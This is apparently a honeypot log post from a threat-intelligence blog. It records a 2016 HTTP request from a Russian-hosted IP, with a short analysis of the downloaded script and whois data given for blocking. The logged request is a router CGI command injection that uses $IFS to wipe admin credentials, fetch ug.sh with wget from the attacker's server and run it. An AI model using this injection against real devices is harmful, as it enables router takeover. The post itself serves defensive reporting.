BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080
END OF DATA
The ug.sh tries to download an binary file
Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.
Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.
Disclaimer:This information is provided as-is and there is no guaranteethat blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
178.57.115[.]231
- Whois Data (TeamCymru)
- AS : 60139
- IP : 178.57.115.231
- BGP Prefix : 178.57.112.0/21
- CC : RU
- Registry : ripencc
- Allocated : 2010-02-02
- AS Name: Z-TELECOM Z-Telecom Ltd,RU
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
Keine Kommentare:
Kommentar veröffentlichen